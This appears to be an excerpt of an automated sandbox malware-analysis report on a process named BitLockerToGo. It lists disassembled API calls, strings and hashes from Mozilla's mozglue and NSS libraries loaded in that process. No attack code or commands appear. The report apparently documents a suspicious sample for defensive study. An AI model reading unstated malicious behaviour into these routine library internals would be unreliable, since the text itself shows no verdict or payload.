                                                                                                                                                      • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                      • API String ID: 3686969729-1266492768
                                                                                                                                                      • Opcode ID: ab583f6e8b30578b2538e2b4efa43aa1634cf27f1754472b68e6a78094cb8dc0
                                                                                                                                                      • Instruction ID: 4864b1b18b7b1a732323bcb306fab3a47bfabbee339f2817cd3c5f2d49b35728
                                                                                                                                                      • Opcode Fuzzy Hash: ab583f6e8b30578b2538e2b4efa43aa1634cf27f1754472b68e6a78094cb8dc0
                                                                                                                                                      • Instruction Fuzzy Hash: 6D22F571A043109FDB319F698A5866F7BB5AF4634CF040D3AE84A97B41FB349844CBB6
                                                                                                                                                      APIs
                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C806CCC
                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D11
                                                                                                                                                      • moz_xmalloc.MOZGLUE(0000000C), ref: 6C806D26
                                                                                                                                                        • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C806D35
                                                                                                                                                      • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C806D53
                                                                                                                                                      • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C806D73
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C806D80
                                                                                                                                                      • CertGetNameStringW.CRYPT32 ref: 6C806DC0
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C806DDC
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806DEB
                                                                                                                                                      • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C806DFF
                                                                                                                                                      • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C806E10
                                                                                                                                                      • CryptMsgClose.CRYPT32(00000000), ref: 6C806E27
                                                                                                                                                      • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C806E34
                                                                                                                                                      • CreateFileW.KERNEL32 ref: 6C806EF9
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000000), ref: 6C806F7D
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C806F8C
                                                                                                                                                      • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C80709D
                                                                                                                                                      • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C807103
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C807153
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C807176
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C807209
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C80723A
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C80726B
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C80729C
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8072DC
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C80730D
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8073C2
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8073F3
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8073FF
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C807406
                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C80740D
                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C80741A
                                                                                                                                                      • moz_xmalloc.MOZGLUE(?), ref: 6C80755A
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C807568
                                                                                                                                                      • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C807585
                                                                                                                                                      • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C807598
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8075AC
                                                                                                                                                        • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                        • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                      • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                      • API String ID: 3256780453-3980470659
                                                                                                                                                      • Opcode ID: 22ad7ec2d696ed7b5345f1aa65482ceef02d92c2a8070a3d6ce59121e83c5dd6
                                                                                                                                                      • Instruction ID: fdcc2b7e822848bd1d7861e1f0d025931e21c760e3aeb2c6196fa9c4bd9c7cef
                                                                                                                                                      • Opcode Fuzzy Hash: 22ad7ec2d696ed7b5345f1aa65482ceef02d92c2a8070a3d6ce59121e83c5dd6
                                                                                                                                                      • Instruction Fuzzy Hash: 0252BA71A003249FEB31DF25CD48BAE77B9EF55708F1049A9E90997640EB706E84CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C830F1F
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C830F99
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C830FB7
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C830FE9
                                                                                                                                                      • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C831031
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C8310D0
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C83117D
                                                                                                                                                      • memset.VCRUNTIME140(?,000000E5,?), ref: 6C831C39
                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C87E744), ref: 6C833391
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C87E744), ref: 6C8333CD
                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C833431
                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C833437
                                                                                                                                                      Strings
                                                                                                                                                      • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C833559, 6C83382D, 6C833848
                                                                                                                                                      • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C833793
                                                                                                                                                      • MOZ_CRASH(), xrefs: 6C833950
                                                                                                                                                      • MALLOC_OPTIONS, xrefs: 6C8335FE
                                                                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C8337BD
                                                                                                                                                      • : (malloc) Unsupported character in malloc options: ', xrefs: 6C833A02
                                                                                                                                                      • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C8337A8
                                                                                                                                                      • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C8337D2
                                                                                                                                                      • Compile-time page size does not divide the runtime one., xrefs: 6C833946
                                                                                                                                                      • <jemalloc>, xrefs: 6C833941, 6C8339F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                      • API String ID: 3040639385-4173974723
                                                                                                                                                      • Opcode ID: 9b89ac997c2cf4212d32f8613b3d79bcfb77dddc5134f0c688c809a383741481
                                                                                                                                                      • Instruction ID: 63a3dd7bf68b938be088e141396ab943ab9d6143ee21b7d052c6982d2ae3c538
                                                                                                                                                      • Opcode Fuzzy Hash: 9b89ac997c2cf4212d32f8613b3d79bcfb77dddc5134f0c688c809a383741481
                                                                                                                                                      • Instruction Fuzzy Hash: 61539D71A056218FC324CF68C640615FBE1BF85728F29EA6DE86D9B791D375E802CBC1
                                                                                                                                                      APIs
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853527
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85355B
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8535BC
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8535E0
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85363A
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853693
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8536CD
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853703
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85373C
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853775
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85378F
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853892
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8538BB
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853902
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853939
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853970
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8539EF
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853A26
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853AE5
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853E85
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853EBA
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C853EE2
                                                                                                                                                        • Part of subcall function 6C856180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C8561DD
                                                                                                                                                        • Part of subcall function 6C856180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C85622C
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C8540F9
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85412F
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C854157
                                                                                                                                                        • Part of subcall function 6C856180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C856250
                                                                                                                                                        • Part of subcall function 6C856180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C856292
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C85441B
                                                                                                                                                      • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C854448
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C85484E
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C854863
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C854878
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C854896
                                                                                                                                                      • free.MOZGLUE ref: 6C85489F
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: floor$free$malloc$memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3842999660-3916222277
                                                                                                                                                      • Opcode ID: eaea0ed44f81afdab4a9eb8cc8bb91ec79d52e040c0934b7c86b77d1c3855433
                                                                                                                                                      • Instruction ID: 054cf1d2d7869de1d812ef606ff373fdfa0444f66698bbc234f393cb1705efe0
                                                                                                                                                      • Opcode Fuzzy Hash: eaea0ed44f81afdab4a9eb8cc8bb91ec79d52e040c0934b7c86b77d1c3855433
                                                                                                                                                      • Instruction Fuzzy Hash: EDF25C749087808FC771CF29C18469AFBF1BFC9308F518A6ED98997711DB719896CB82
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CA3A8EC,0000006C), ref: 6C936DC6
                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CA3A958,0000006C), ref: 6C936DDB
                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CA3A9C4,00000078), ref: 6C936DF1
                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CA3AA3C,0000006C), ref: 6C936E06
                                                                                                                                                      • memcpy.VCRUNTIME140(?,6CA3AAA8,00000060), ref: 6C936E1C
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C936E38
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C936E76
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C93726F
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C937283
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                      • String ID: !
                                                                                                                                                      • API String ID: 3333340300-2657877971
                                                                                                                                                      • Opcode ID: 1c8c667800ff0336cdf75a96b59025792dd40b83dcd5847c9a2e5ec7c1a473d7
                                                                                                                                                      • Instruction ID: 1982ead448e3445e1ca479004817b26af6335830ac83058f920aae07833d5a22
                                                                                                                                                      • Opcode Fuzzy Hash: 1c8c667800ff0336cdf75a96b59025792dd40b83dcd5847c9a2e5ec7c1a473d7
                                                                                                                                                      • Instruction Fuzzy Hash: C8728B75D05229DBDF20CF28CC8879ABBB5BB59308F1441A9D80DA7741EB31EA85CF91
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8064DF
                                                                                                                                                      • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8064F2
                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C806505
                                                                                                                                                      • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C806518
                                                                                                                                                      • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C80652B
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C80671C
                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C806724
                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C80672F
                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C806759
                                                                                                                                                      • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C806764
                                                                                                                                                      • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C806A80
                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C806ABE
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C806AD3
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AE8
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C806AF7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                                                                                                      • API String ID: 487479824-2878602165
                                                                                                                                                      • Opcode ID: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                      • Instruction ID: a864e295928d444ea4a0c4d01a5dc763abc6abcbf106edac1fe00cd438ac9755
                                                                                                                                                      • Opcode Fuzzy Hash: 2749d02ba6f94dccf1db93fd05545f25a136a7724046a449af5ef22b10354ad7
                                                                                                                                                      • Instruction Fuzzy Hash: 47F1F470A056299FDB30DF24CE48B9AB7B5AF46318F1446A9DC09A7741E731AEC4CF90
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C97ACC4
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C97ACD5
                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C97ACF3
                                                                                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C97AD3B
                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C97ADC8
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C97ADDF
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C97ADF0
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C97B06A
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C97B08C
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C97B1BA
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C97B27C
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C97B2CA
                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C97B3C1
                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C97B40C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1285963562-0
                                                                                                                                                      • Opcode ID: 7a333a9affd129e894146fb63c955924ea875b25eea73cbc72d7feb78c4ed570
                                                                                                                                                      • Instruction ID: 57ef6201ba43bcf70cef1f966100a50658650443cd75d44ed69dc1eb4e0a8c0c
                                                                                                                                                      • Opcode Fuzzy Hash: 7a333a9affd129e894146fb63c955924ea875b25eea73cbc72d7feb78c4ed570
                                                                                                                                                      • Instruction Fuzzy Hash: 0322BF71906300EFE720CF14CC45B9A77F5AFA430CF248568E8585B792E772E859CBA6
                                                                                                                                                      APIs
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85C5F9
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85C6FB
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C85C74D
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C85C7DE
                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C85C9D5
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85CC76
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C85CD7A
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85DB40
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C85DB62
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C85DB99
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85DD8B
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C85DE95
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C85E360
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C85E432
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C85E472
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                      • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                      • Instruction ID: c50447f1f59a532adfc08cda5c5f8a82d8b72bf2ef614ac2ee8cf66487759635
                                                                                                                                                      • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                                                                                                      • Instruction Fuzzy Hash: 8633CD71E0021A8FCB14CFA8C9C06EDBBF2FF49300F68866AD855AB745D771A955CB90
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C8FED38
                                                                                                                                                        • Part of subcall function 6C894F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C894FC4
